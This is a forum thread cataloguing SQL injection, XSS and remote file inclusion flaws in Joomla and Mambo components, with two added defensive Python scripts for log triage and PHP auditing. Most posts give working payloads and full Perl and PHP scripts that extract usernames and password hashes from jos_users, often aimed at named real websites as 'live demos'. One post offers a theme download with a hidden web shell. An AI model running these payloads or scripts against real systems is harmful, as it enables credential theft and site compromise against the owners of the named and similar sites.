Overview of vulnerabilities in CMS [Joomla, Mambo] and their components

Discussion in 'Web vulnerabilities' started by it's my, 6 Oct 2007.

  1. swt1

    Joomla Component com_jumi (fileid) Blind SQL Injection Exploit

    ------------------------------------------------------------------------------
    Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability
    ------------------------------------------------------------------------------


    #####################################################
    # [+] Author : Chip D3 Bi0s #
    # [+] Email : chipdebios[alt+64]gmail.com #
    # [+] Vulnerability : Blind SQL injection #
    #####################################################



    Example:

    Code:
    http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>
    n=number fileid valid

    <Sql code>:

    Code:
    '+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*  '+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*  /index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
    etc, etc...

    DEMO LIVE:
    Code:
    http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/*
    etc, etc....

    +++++++++++++++++++++++++++++++++++++++
    #[!] Produced in South America
    +++++++++++++++++++++++++++++++++++++++

    if you want to save the work, you can use the following script

    -------------------------------

    PHP:
    #!/usr/bin/perl -w    use LWP::UserAgent;      print "\t\t-------------------------------------------------------------\n\n";  print "\t\t                      |  Chip d3 Bi0s |                       \n\n";  print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection        \n\n";  print "\t\t-----------------------------------------------------------------\n\n";          print "http://wwww.host.org/Path: ";  chomp(my $target=<STDIN>);  print " [-] Introduce fileid: ";  chomp($z=<STDIN>);    print " [+] Password: ";    $column_name="concat(password)";  $table_name="jos_users";      $b = LWP::UserAgent->new() or die "Could not initialize browser\n";  $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');      for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter  {            #c referido a ascci 48-57, 97-102             for ($c=48;$c<=57;$c++)     {   $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";   my $res = $b->request(HTTP::Request->new(GET=>$host));   my $content = $res->content;   my $regexp = "com_";  # print "limit:";  # print "$x";  # print "; assci:";  # print "$c;";   if ($content =~ /$regexp/) {$char=chr($c); print "$char";}   }            for ($c=97;$c<=102;$c++)   {          $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";   my $res = $b->request(HTTP::Request->new(GET=>$host));   my $content = $res->content;   my $regexp = "com_";  # print "limit:";  # print "$x";  # print "; assci:";  # print "$c;";   if ($content =~ /$regexp/) {$char=chr($c); print "$char";}   }       }
    # milw0rm.com [2009-06-15]
     
    #141 swt1, 16 Jun 2009
    Last edited: 16 Jun 2009
  2. swt1

    Joomla Component com_ijoomla_rss Blind SQL Injection Exploit

    Code:
    #!/usr/bin/perl  use LWP::UserAgent;  use Getopt::Long;  if(!$ARGV[1])  {    print "                                                                        \n";    print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";    print "  o   Joomla Component com_ijoomla_rss Blind SQL Injection Exploit              o\n";    print "  o   Author:xoron                                               o\n";    print "  o   More info:http://joomla15.ijoomlademo.com o\n";    print "  o   vendor:http://ijoomlademo.com                                o\n";    print "  o   Dork :   com_ijoomla_rss                                       o\n";    print "  o   Usage:   perl bachir.pl host path <options>                       o\n";    print "  o   Example: perl bachir.pl www.host.com /joomla/ -s 2                o\n";    print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";    exit;  }  my $host    = $ARGV[0];  my $path    = $ARGV[1];  my $userid  = 1;  my $sid     = $ARGV[2];  my %options = ();  GetOptions(\%options, "u=i", "s=i");  print "[~] Exploiting...\n";  if($options{"u"})  {    $userid = $options{"u"};  }  if($options{"s"})  {    $sid = $options{"s"};  }  syswrite(STDOUT, "[~] MD5-Hash: ", 14);  for(my $i = 1; $i <= 32; $i++)  {    my $f = 0;    my $h = 48;    while(!$f && $h <= 57)    {      if(istrue2($host, $path, $userid, $sid, $i, $h))      {        $f = 1;        syswrite(STDOUT, chr($h), 1);      }      $h++;    }    if(!$f)    {      $h = 97;      while(!$f && $h <= 122)      {        if(istrue2($host, $path, $userid, $sid, $i, $h))        {          $f = 1;          syswrite(STDOUT, chr($h), 1);        }        $h++;      }    }  }  print "\n[~] Exploiting done\n";  sub istrue2  {    my $host  = shift;    my $path  = shift;    my $uid   = shift;    my $sid   = shift;    my $i     = shift;    my $h     = shift;       my $ua = LWP::UserAgent->new;    my $query = 
"http://".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")";    my $resp = $ua->get($query);    my $content = $resp->content;    my $regexp = "seminar_boxA";       if($content =~ /$regexp/)    {      return 1;    }    else    {      return 0;    }  }
    # milw0rm.com [2009-06-15]
     
  3. swt1

    Joomla Component com_tickets <= 2.1 (id) SQL Injection Vuln

    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Joomla Component com_tickets (id) SQL-injection Vulnerability
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    ###################################################
    [+] Author : Chip D3 Bi0s
    [+] Email : chipdebios[alt+64]gmail.com
    [+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt
    [+] Vulnerability : SQL injection

    ###################################################

    Info component:
    ---------------
    Name : Tickets
    Version : 0.1 & 2.1
    Author : Paul Coogan
    Author email : [email protected]
    Web author : http://www.ideabuzz.com

    ###################################################

    Code:
    Example:  http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]
    n = id valid

    Demo Live Joomla : version 2.1
    ------------------------------

    Code:
    http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/*
    Demo Live Mambo : Version 0.1
    -----------------------------

    Code:
    http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/*
    +++++++++++++++++++++++++++++++++++++++
    #[!] Produced in South America
    +++++++++++++++++++++++++++++++++++++++

    # milw0rm.com [2009-06-22]
     
  4. Fata1ex

    com_svmap
    Stumbled on this by accident. Maybe someone can take it further, if there is anything to take further, of course.
    Code:
    www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
     
  5. --StraNger--

    If I'm not mistaken, this is not a hole,
    just an error in data handling.
     
  6. shell_c0de

    SQL injection in the doQment component for Joomla

    Vulnerability: the vulnerable parameter is cid=

    Example:
    Code:
    http://www.agmodena.it/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users/**/where/**/usertype=CHAR(83,117,112,101,114,32,65,100,109,105 ,110,105,115,116,114,97,116,111,114)#&Itemid=92
    Dork: inurl:com_doqment + cid=
    # shell_c0de
     
    _________________________
    #146 shell_c0de, 8 Jul 2009
    Last edited: 8 Jul 2009
    3 people like this.
  7. InDuStRieS

    Joomla Almond Classifieds Component SQL Injection and Cross-Site Scripting

    Description:
    Moudi has reported some vulnerabilities in the Almond Classifieds component for Joomla, which can be exploited by malicious people to conduct SQL injection and cross-site scripting attacks.

    1) Input passed via the "replid" to index.php (when "option" is set to "com_aclassf", "Itemid" is set to a valid id, "ct" to "manw_repl" and "md" is set to "add_form") is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    2) Input passed via the "addr" parameter to components/com_aclassf/gmap.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    The vulnerabilities are reported in version 7.5. Other versions may also be affected.

    Code:
    ###########################################################################
    #-----------------------------I AM MUSLIM !!------------------------------#
    ###########################################################################
    
    ==============================================================================
                                      _       _          _                _         _   _ 
                                     / \      | |        | |               / \       | |  | |
                                    / _ \    | |        | |              / _ \     | |_| |
                                  / ___ \  | |___  | |___       /___ \   |  _   |
       IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\  |_| |_|
                                                                 
    
    ==============================================================================
            [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
    ==============================================================================
            [»] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
    ==============================================================================
    
            [»] Script:             [ Joomla Almond Classifieds v.7.5 ]
            [»] Language:           [ PHP ]
            [»] Download:           [ http://www.almondsoft.com  ]
            [»] Founder:            [ Moudi <[email protected]> ]
            [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
            [»] Team:               [ EvilWay ]
            [»] Dork:               [ OFF ]
            [»] Price:              [ $195 ]
            [»] Site :              [ https://security-shell.ws/forum.php ]
    
    ###########################################################################
    
    ===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===
    
    [»] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
    
    [»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438   and 1=1 <= TRUE
    [»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438   and 1=2 <= FALSE
    
    [»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
        => TRUE
    [»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
        => FALSE
    
    ===[ Exploit XSS + LIVE : vulnerability ]===
    
    [»] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]
    
    [»] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>
    
    Author: Moudi
    
    ###########################################################################
    
     
    1 person likes this.
  8. xa-xa89

    Joomla component com_fireboard SQL-inj

    Vulnerable parameter: func
    Code:
    ?func=who',%20userid=123,%20link=(SELECT %20jos_users.password%20FROM%20jos_users%20WHERE%20jos_users.id=123)%20--%20a
    For more details, see here
    http://forum.antichat.ru/threadnav130926-1-10.html
    and here
    http://forum.antichat.ru/showpost.php?p=1409117&postcount=33
     
  9. swt1

    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    ###################################################
    [+] Author : Chip D3 Bi0s
    [+] Email : chipdebios[alt+64]gmail.com
    [+] Vulnerability : Blind SQL injection

    ###################################################

    Example:
    Code:
    http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code]  n:valid Itemid
    Sql code:
    Code:
    +and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
    etc, etc...

    DEMO LIVE:
    Code:
    http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
    Code:
    http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97  !False ¡¡¡¡
    Code:
    http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98  ¡True ¡¡¡¡
    etc, etc...

    # milw0rm.com [2009-08-01]
     
    #149 swt1, 2 Aug 2009
    Last edited: 2 Aug 2009
  10. swt1

    http://wwww.host.org/Path : http://www.cd7.com.ec/
    [-] Introduce Itemid : 66
    [-] Introduce coincidencia : http://www.cd7.com.ec/forum/

    +++++++++++++++++++++++++++++++++++++++
    #[!] Produced in South America
    +++++++++++++++++++++++++++++++++++++++

    PHP:
     #!/usr/bin/perl -w  use LWP::UserAgent;  use Benchmark;  my $t1 = new Benchmark;      print "\t\t-------------------------------------------------------------\n\n";  print "\t\t                      |  Chip d3 Bi0s |                       \n\n";  print "\t\t Joomla Component com_jfusion (Itemid) Blind SQL-injection        \n\n";  print "\t\t-------------------------------------------------------------\n\n";      print "http://wwww.host.org/Path   : ";chomp(my $target=<STDIN>);  print " [-] Introduce Itemid       : ";chomp($z=<STDIN>);  print " [-] Introduce coincidencia : ";chomp($w=<STDIN>);      $column_name="concat(password)";  $table_name="jos_users";      $b = LWP::UserAgent->new() or die "Could not initialize browser\n";  $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');    print "----------------Inyectando----------------\n";    #es Vulnerable?    $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=1";    my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;    if ($content =~ /$regexp/) {    $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=2";    my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;    if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}    else    {print " [-] Vulnerable :)\n";    for ($x=1;$x<=32;$x++)       {      $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))>57";    my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;    print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}#para alininear 0..9 con los 10-32      if ($content =~ /$regexp/)    {                for ($c=97;$c<=102;$c++)     {   $host = $target . 
"/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." ";   my $res = $b->request(HTTP::Request->new(GET=>$host));   my $content = $res->content;   my $regexp = $w;       if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}   }        }  else  {    for ($c=48;$c<=57;$c++)     {   $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." ";   my $res = $b->request(HTTP::Request->new(GET=>$host));   my $content = $res->content;   my $regexp = $w;     if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}   }      }        }  print " [+] Password   :"." ".join('', @caracter) . "\n";  my $t2 = new Benchmark;  my $tt = timediff($t2, $t1);  print "El script tomo:",timestr($tt),"\n";    }  }    else    {print " [-] Exploit Fallo :(\n";}
    # milw0rm.com [2009-08-01]
     
    #150 swt1, 2 Aug 2009
    Last edited: 2 Aug 2009
  11. swt1

    Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit

    PHP:
    <?php

    /*
    --------------------------

    Joomla <=1.0.15 Component com_pms <=2.0.4  (Ignore-List) SQl-Injection Vuln

    --------------------------

    Author: M4dhead

    Vulnerable joomla component : com_pms

    Conditions        : magic_quotes_gpc = On or Off it doesn't matter ;)

    --------------------------

    PREPARATION:
    --------------------------
    You need a valid Account on the Joomla 1.0.15 Site + Community Builder Suite 1.1.0:


    Community Builder Suite 1.1.0:
    http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,1175.html

    PMS enhanced Version 2.0.4 J 1.0
    http://www.make-website.de/script-downlaods?task=summary&cid=123&catid=214


    Install Joomla 1.0.15
    Install Community Builder
    Install PMS Enhanced
        Activate the Ignorlist in Components->PMS Enhanced->Config
        Tab: Backend -> Ingorlist: Yes


    Create a valid User on the target Joomla 1.0.15 System with Community Builder,
    login and copy the cookieinformation into the $cookie var below,
    adjust the User-Agent on your Post Header dependent on your Browser.


    Notice: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
    because the cookie-name is dependent on your browser.
    --------------------------

    USAGE:
    --------------------------
    Run this script! If there's not shown a page that prompt you to login, the attack was successful.
    Then go to the ignore list: www.yourtargetsite.com/index.php?option=com_pms&Itemid=&page=ignore
    and you will see some username and passwords in the selectbox :-)

    Have fun!!

    ----------------------------------------------------
    */


    $host "localhost"//your target Joomla Site
    $cookie "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e14367d5c7298f6c72c"//replace this with your own cookie values
    $useragent "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n";

    //NOTICE: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
    //because the cookie-name is dependent on your browser.

    //Don't change anything below
    $path "/joomla/index.php?option=com_pms&Itemid=&page=ignore"//dont change this
    $data_to_send "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |"//you don't have to change this


    print_r($post PostToHost($host$path$cookie$data_to_send$useragent));



    function 
    PostToHost($host$path$cookie$data_to_send$useragent) {
      
    $fp fsockopen($host80);
      
    fputs($fp"POST $path HTTP/1.1\r\n");
      
    fputs($fp"Host: $host\r\n");
      
    fputs($fp"User-Agent: $useragent");
      
    fputs($fp"Cookie: $cookie\r\n");
      
    fputs($fp"Content-type: application/x-www-form-urlencoded\r\n");
      
    fputs($fp"Content-length: "strlen($data_to_send) ."\r\n");
      
    fputs($fp"Connection: close\r\n\r\n");
      
    fputs($fp$data_to_send);
      while(!
    feof($fp)) {
          
    $res .= fgets($fp128);
      }
      
    fclose($fp);

      return 
    $res;
    }

    ?>
    # milw0rm.com [2009-08-07]
     
  12. FAQ666

    COM_SOBI2
    SQL INJECTION
    http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.html
    Tested only on Joomla_1.0.x

    Code:
    index.php?option=com_sobi2&sobi2Task=search&Itemid=26
    benchmark

    enter into the search field
    Code:
    ')and+benchmark(10000000,benchmark(10000000,md5(now())))# a
    Be sure to remove all spaces
    and press search)
     
    #152 FAQ666, 10 Aug 2009
    Last edited: 10 Aug 2009
    1 person likes this.
  13. Ded MustD!e

    Vulnerabilities in Joomla/Mambo components

    Vulnerability: SQL-Inj
    Component: The Publications
    Vulnerability in file publications.php
    Vulnerable code:
    PHP:
    $query = "SELECT * FROM #__content WHERE catid=$id  ORDER BY title DESC";
    Example:
    Code:
    http://www.bscic.gov.bd/index.php?option=com_publications&Itemid=20&lang=en&id=6/**/and/**/1=0/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
     
    4 people like this.
  14. Nelzone

    SQL injection exploits in Joomla components

    PacketStorm, a website devoted to computer security, has published 7 exploits at once demonstrating SQL injection in add-on components of the popular content management system Joomla. The exploits apply to the following components of the system: com_speech, com_pressrelease, com_mediaalert, com_joomloc, com_lucygames, com_tpdugg and com_bfsurvey_profree.

    Joomla Speech (exploit)
    Joomla Press Release (exploit)
    Joomla Media Alert (exploit)
    Joomla Joomloc (exploit)
    Joomla LucyGames (exploit)
    Joomla TPDugg (exploit)
    Joomla BF Survey Pro Free (exploit)
     
  15. Ded MustD!e

    Vulnerability: SQL-Inj
    Component: Jeporter
    Version: 2.0
    Vulnerability in file jeporter.php
    Vulnerable code:
    PHP:
    // 'cid' comes straight from the request and is concatenated unquoted below
    $cid = mosGetParam( $_REQUEST, 'cid', false );
    $sql = "SELECT * FROM #__jeporter WHERE id= ".$cid;
    $database->setQuery( $sql );
    $report = NULL;
    $database->loadObject( $report );

    $cid = $report->id;
    $title = $report->title;
    $jquery = $report->jquery;

    $sql = "SELECT * FROM #__jeporter_fields WHERE jeportid= ".$cid;
    $database->setQuery( $sql );
    $rows = $database->loadObjectList();
    Example:
    Code:
    http://www.nationalaidsstrategy.org/index.php?option=com_jeporter&task=showreport&cid=-4+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+jos_users--
     
    8 people like this.
  16. Zitt

    Maybe this will be useful to someone... A theme with a shell inside..
    after the theme is installed, the shell will be at http://site.name/templates/jd_lagoon/ads.php

    http://depositfiles.com/files/lhtkdh0m1
     
    #156 Zitt, 12 Sep 2009
    Last edited: 15 Sep 2009
    3 people like this.
  17. Ded MustD!e

    Vulnerability: Blind SQL-Inj
    Component: com_clan_members
    Version: 0.9.2.2b
    Vulnerability in file clan_members.html.php
    Vulnerable code:
    PHP:
    // $id is placed unquoted into each of the queries below
    $database->setQuery("SELECT * FROM #__clan_members WHERE id = $id"  );
    $member = $database -> loadAssocList();
    $database->setQuery("SELECT * FROM #__users WHERE id = $id AND block = '0'"  );
    $usersdata = $database -> loadAssocList();
    $database->setQuery("SELECT * FROM #__clan_members_squadperuser WHERE uid=$id");
    $rowsquadperuser = $database -> loadObjectList();
    $database->setQuery("SELECT * FROM #__clan_members_comment WHERE memberid=$id");
    $rowmembercomment = $database -> loadObjectList();
    $database->setQuery("SELECT * FROM #__clan_members_fields WHERE published=1 ORDER BY ordering" );
    $rowmemberfields = $database -> loadObjectList();
    #Check if the user is logged in into the side
    $database->setQuery("SELECT count(distinct(userid)) as user_online FROM #__session WHERE guest=0 AND userid = $id");
    $online = $database->loadResult();
    foreach($rowsquadperuser as $squadperuser)
        {
            $database->setQuery("SELECT * FROM #__clan_members_squad WHERE published = '1' AND id = '$squadperuser->sid'"  );
            $squadname = $database -> loadAssocList();
            if($squadname[0]["squadpicture"] != '' || $squadname[0]["squadname"] != '')
            {
            $squadpicture_array[$i+1] = $squadname[0]["squadpicture"];
            if($i == 0) $squadnames .= $squadname[0]["squadname"]; else $squadnames .= ",".$squadname[0]["squadname"];
            $i++;
            }
        }
    Example:
    true ->
    Code:
    http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=5&task=showClanMemberDetails
    false ->
    Code:
    http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=4&task=showClanMemberDetails
     
    1 person likes this.
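
The posts above inject through request parameters that the components use as integers (Itemid, id, cid, fileid) and, in the blind cases, repeat one request while changing only a character position and a compared value. The following Python triage for web-server access logs is an added example, not code from any poster or from Joomla; the parameter list, function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Request parameters that the components quoted in this thread use as integers
# (list assembled from the thread; extend it for the components you run).
NUMERIC_PARAMS = {"id", "cid", "itemid", "fileid", "node", "replid", "idproyecto"}

# SQL fragments that have no business inside a query-string value.
SQL_TOKENS = re.compile(
    r"union\s+select|substring\s*\(|ascii\s*\(|benchmark\s*\(|"
    r"concat(?:_ws)?\s*\(|\b(?:jos|mos)_users\b",
    re.IGNORECASE,
)
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3}')


def parse_line(line):
    """Return (client, request_target) for a combined-format log line, else None."""
    m = LOG_LINE.match(line)
    return (m.group(1), m.group(2)) if m else None


def inspect(target):
    """Return a list of (parameter, reason) findings for one request target."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # /**/ is used in place of spaces, so collapse comments before matching.
        flat = re.sub(r"/\*.*?\*/", " ", value)
        # Plain integers and Joomla 1.5 "12:alias" slugs are the legitimate forms.
        if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+(?::[\w-]+)?", value):
            findings.append((name, "non-integer value in numeric parameter"))
        if SQL_TOKENS.search(flat):
            findings.append((name, "SQL fragment in value"))
    return findings


def extraction_bursts(lines, threshold=5):
    """Count flagged requests per client that share one shape once digits are masked.

    Blind extraction repeats a request many times, changing only the character
    position and the compared value, so the masked shape stays constant.
    """
    shapes = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        client, target = parsed
        if inspect(target):
            shapes[(client, re.sub(r"\d+", "N", target))].add(target)
    return {key: len(urls) for key, urls in shapes.items() if len(urls) >= threshold}


def sample_log():
    """Constructed log lines; addresses come from documentation ranges."""
    base = '{ip} - - [01/Aug/2009:10:00:{s:02d} +0000] "GET {t} HTTP/1.1" 200 5120'
    probe = ("/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+"
             "concat(password)+from+jos_users+limit+0,1),1,1))={c}")
    lines = [base.format(ip="192.0.2.10", s=i, t=probe.format(c=48 + i)) for i in range(6)]
    lines.append(base.format(ip="198.51.100.7", s=30,
                             t="/index.php?option=com_jfusion&Itemid=66"))
    lines.append(base.format(ip="198.51.100.7", s=31,
                             t="/index.php?option=com_jeporter&task=showreport"
                               "&cid=-4+union+select+1,2,3,4,5--"))
    return lines


if __name__ == "__main__":
    for entry in sample_log():
        client, target = parse_line(entry)
        for name, reason in inspect(target):
            print(client, name, reason)
    for (client, shape), count in extraction_bursts(sample_log()).items():
        print("burst:", client, count, shape)
```
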
  18. Ded MustD!e

    Vulnerability: RFI
    Component: UH_Events
    Version: 0.99.0RC3a
    Vulnerability in file admin.uhevents.php
    Requirements: register_globals & allow_url_fopen = On
    Vulnerable code:
    PHP:
    require_once( $mosConfig_absolute_path."/administrator/components/$option/uhevents_config.php");
    Exploit:
    Code:
    .../components/uh_events/admin.uhevents.php?mosConfig_absolute_path=http://shell?
     
    5 people like this.
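
The require_once line in the post above builds its path from variables that the file itself never sets, so when the file is requested directly with register_globals on, those values come from the request. The following static check is an added example, not part of the original post or of the component: it reports include/require statements built from unassigned variables in PHP files that lack the Mambo/Joomla direct-access guard, and lists the PHP settings from the post's requirements that are switched on. Function names and sample inputs are constructed; allow_url_include is added to the list because PHP 5.2 and later gate remote includes on it.

```python
import re

# Direct-access guard used by Mambo / Joomla 1.0 (_VALID_MOS) and Joomla 1.5 (_JEXEC).
GUARD = re.compile(
    r"defined\s*\(\s*['\"]_(?:VALID_MOS|JEXEC)['\"]\s*\)\s*(?:or|\|\|)\s*die", re.I)
INCLUDE = re.compile(r"\b(?:require|include)(?:_once)?\b(.*?);", re.I)
ASSIGN = re.compile(r"^\s*\$(\w+)\s*=[^=]")
VARIABLE = re.compile(r"\$(\w+)")

RISKY_INI = ("register_globals", "allow_url_fopen", "allow_url_include")


def audit_php(source):
    """Return (line_number, variable) for each unassigned variable used in an
    include/require path before any direct-access guard has been seen."""
    findings, guarded, assigned = [], False, set()
    for number, line in enumerate(source.splitlines(), start=1):
        if GUARD.search(line):
            guarded = True
        assignment = ASSIGN.match(line)
        if assignment:
            assigned.add(assignment.group(1))
        include = INCLUDE.search(line)
        if include and not guarded:
            for var in VARIABLE.findall(include.group(1)):
                if var not in assigned:
                    findings.append((number, var))
    return findings


def risky_ini(text):
    """Return the sorted names of risky php.ini directives that are enabled."""
    enabled = []
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()   # drop php.ini comments
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key in RISKY_INI and value.strip('"').lower() in ("on", "1", "true", "yes"):
            enabled.append(key)
    return sorted(enabled)


# Constructed samples: the require_once line is the one quoted in the post,
# the guarded variant adds the standard Mambo / Joomla 1.0 guard above it.
VULNERABLE = """<?php
require_once( $mosConfig_absolute_path."/administrator/components/$option/uhevents_config.php");
"""

GUARDED = """<?php
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
require_once( $mosConfig_absolute_path."/administrator/components/$option/uhevents_config.php");
"""

SAMPLE_INI = """register_globals = On
allow_url_fopen = On ; distribution default
allow_url_include = Off
"""

if __name__ == "__main__":
    print("unguarded file:", audit_php(VULNERABLE))
    print("guarded file:  ", audit_php(GUARDED))
    print("enabled risky settings:", risky_ini(SAMPLE_INI))
```
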
  19. Dimi4

    Vulnerability: SQL
    Component: Projects
    Stumbled on it by accident)
    Code:
    ?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
    Example:

    http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

    Also here
    Vulnerability: SQL
    Component: com_nodes
    Code:
    ?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal
    http://www.inab.org/index.php?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal
     
    #159 Dimi4, 27 Sep 2009
    Last edited: 27 Sep 2009
    6 people like this.
  20. Rashid

    Vulnerability scanner for Joomla

    http://sourceforge.net/projects/joomscan/
     
    1 person likes this.